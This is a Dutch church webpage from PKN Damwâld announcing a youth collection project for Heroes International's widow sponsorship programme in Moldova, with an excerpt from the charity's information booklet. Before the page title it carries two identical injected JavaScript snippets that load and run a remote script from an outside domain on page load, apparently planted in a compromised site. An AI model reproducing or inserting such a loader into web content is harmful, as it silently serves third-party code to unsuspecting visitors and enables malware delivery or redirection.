;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Collectproject Heroes International weduwe sponsorprogramma - PKN Damwâld

Collectproject Heroes International weduwe sponsorprogramma

Gepubliceerd op: dinsdag 23 november 2021

Het collectproject van het jeugdwerk, mede ondersteunt door de diaconieën, is Heroes International. Hieronder staat een deel van hun verhaal. Opkomen voor de weduwe en de wees, waar Jacobus ons op wijst in zijn brief. Heel concreet mensen helpen. We blijven hier voor sparen tot en met de kerst. Naast de het sparen van de jeugd, mag u natuurlijk ook deze organisatie ondersteunen met gebed en een financiële gift.
Onderstaand is een deel van hun informatieboekje.

Over Heroes International
Heroes International verzamelt gewone mensen om op buitengewone manieren te dienen en kwetsbare senioren over de hele wereld te dienen. Momenteel richten we ons op ons pilot Widow Sponsorship-programma in het diep verarmde Oost-Europese land Moldavië, waar we zorgen voor 25 verlaten weduwen. Heroes-medewerkers zijn voormalige wezen, die uit het systeem zijn gelopen en anderszins het risico lopen te worden verhandeld voor seks of arbeid. We huren elke student in, trainen hem of haar in sociaal werk en betalen bovendien een leefbaar loon om dorpen in te trekken en ouderen te dienen. Ze leveren liefde in de vorm van voedsel, brandhout, medicijnen en een gedeeld kopje thee een keer per week. Bovendien brengen medewerkers en vrijwilligers van Heroes benodigdheden voor de favoriete hobby van elke weduwe, zoals breien of licht tuinieren. Dit programma is geweldig – senioren hebben een jonger persoon die regelmatig op bezoek komt; het geeft hen iets om naar uit te kijken en een gevoel van waardigheid en waarde in de ogen van een ander. Voor onze medewerkers, als ex-weeskinderen, hebben ze voor het eerst oudere vrienden die hen vriendelijk en met respect behandelen. De ouderen spreken vrede en wijsheid tot de jongere en brengen het broodnodige perspectief. En, zoals onze medewerkers melden, is dit de eerste keer dat ze zich zelf belangrijk en nodig voelen. Het redt levens van de meest kwetsbare bevolking vanMoldavië: vrouwen die risico lopen – weduwen en wezen. Elk jaar verhongeren of vriezen duizenden senioren in Moldavië. Elk jaar accepteren duizenden nietsvermoedende jonge vrouwen die graag willen werken werkaanbiedingen in het buitenland en worden ze gedwongen tot sekswerk. Een voor een voorkomen we deze tragedies en vervangen we ze door verhalen over verlossing.